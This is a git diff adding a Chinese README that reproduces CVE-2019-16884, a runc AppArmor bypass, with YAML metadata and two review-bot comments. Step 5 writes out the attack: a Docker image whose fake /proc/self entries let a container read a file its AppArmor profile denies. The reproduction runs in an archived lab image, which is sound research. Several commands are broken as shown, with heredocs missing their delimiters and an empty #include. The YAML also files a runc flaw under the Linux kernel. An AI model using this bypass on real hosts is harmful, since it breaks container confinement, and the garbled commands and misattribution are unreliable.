diff --git a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md new file mode 100644 index 0000000000000000000000000000000000000000..0c8d3f4237505186f24fd993037f538837afd024 --- /dev/null +++ b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md @@ -0,0 +1,68 @@ +# CVE-2019-16884 + +PoC for CVE-2019-16884 +### 简介 +apparmor 可以让管理员通过程序的配置文件限制程序的功能,其本身作为一个内核模块集成在 Linux 内核中 +(可能发现 lsmod 里面并没有 apparmor,这是因为 lsmod 展示的是所有动态加载的内核模块, +通过 ls /sys/module/ 就可以看到所有的内核模块包括系统中内置的),因此其通过内核提供强访问控制。 + +CVE-2019-16884 可以使得用户绕过 apparmor 的一些策略进而可以实现一些提权操作。 + +``` +cat /sys/module/apparmor/parameters/enabled # 查看是否开启apparmor,返回为Y表示开启 +sudo cat /sys/kernel/security/apparmor/profiles # 查看加载的配置文件 +``` +### 构建实验环境 + +``` +> docker run -it ssst0n3/docker_archive:CVE-2019-16884 + +ubuntu login: root +Password: root +``` +### 漏洞复现 +#### 1、创建apparmor规则 + +``` +> cat > /etc/apparmor.d/no_flag < +profile no_flag flags=(attach_disconnected,mediate_deleted) { + #include + file, + deny /flag r, +} +EOF +``` + +#### 2、创建一个flag文件 +``` +echo "Al1ex is comming" > /tmp/flag +``` + +#### 3、应用规则 +``` +/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag +``` + +#### 4、检测,启动一个正常镜像此时无权限读取/flag内容3 +``` +docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag busybox cat /flag +``` + +#### 5、利用漏洞启用一个恶意镜像,可以读取/flag +``` +> mkdir -p rootfs/proc/self/{attr,fd} +> touch rootfs/proc/self/{status,attr/exec} +> touch rootfs/proc/self/fd/{4,5} +> cat < Dockerfile +FROM busybox +ADD rootfs / +VOLUME /proc +EOF +> docker build -t apparmor-bypass . +> docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag apparmor-bypass cat /flag +``` + +通过上述步骤即可完成漏洞的复现 + diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml new file mode 100644 index 0000000000000000000000000000000000000000..0f38b7149b264c59bb0cdb25337e642a9d9b21a9 --- /dev/null +++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml 
@@ -0,0 +1,25 @@ +id: CVE-2019-16884 +source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md +info: + name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. + severity: high + description: | + runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory + scope-of-influence: + Red Hat Enterprise Linux 8 + Red Hat Enterprise Linux 7 Extras + Red Hat OpenShift Container Platform 4.1 + Red Hat OpenShift Container Platform 4.2 + Red Hat OpenShift Container Platform 3.9 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 + - https://usn.ubuntu.com/usn/usn-4297-1 + - https://security.netapp.com/advisory/ntap-20220221-0004/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2019-16884 + cwe-id: CWE-863 + cnvd-id: None + kve-id: None + tags: privilege escalation \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index eae3bac29caa1c55f3195b6adfcb2e4802fc7aea..5d280333b36e54c5ad800210a6a94f083cf0ca4a 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -1,6 +1,7 @@ #此收录漏洞列表为非openKylin发行版用例。 cve: linux-kernel: + - CVE-2019-16884 - CVE-2021-33909 - CVE-2021-3493 - CVE-2022-0995
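Review bot: In the ReadMe.md hunk, both heredocs are broken as written: `cat > /etc/apparmor.d/no_flag <` and `cat < Dockerfile` carry no `<<EOF` delimiter even though each block is closed by an `EOF` line, so the first command fails and the second tries to read a Dockerfile that does not exist yet; they should read `cat > /etc/apparmor.d/no_flag <<EOF` and `cat <<EOF > Dockerfile`. The `#include` line inside the profile has also lost its argument, and the step-4 heading ends in a stray `3`. The README never states which versions are affected; adding the runc (through 1.0.0-rc8) and Docker (through 19.03.2-ce) ranges given in the yaml of this same patch would tell readers that the reproduction depends on the archive image shipping a vulnerable runc.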
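Review bot: In the CVE-2019-16884.yaml hunk, `name:` holds a boilerplate sentence about the Linux kernel instead of a name for this vulnerability, while `description` correctly attributes the bug to the mount-target check in runc's libcontainer/rootfs_linux.go; since the flaw is in runc, filing it under cve/linux-kernel and introducing it as a kernel issue is misleading, and `scope-of-influence` should list runc through 1.0.0-rc8 and Docker through 19.03.2-ce alongside the Red Hat products, since those are the affected components named in the description. The file also lacks a trailing newline (`\ No newline at end of file`).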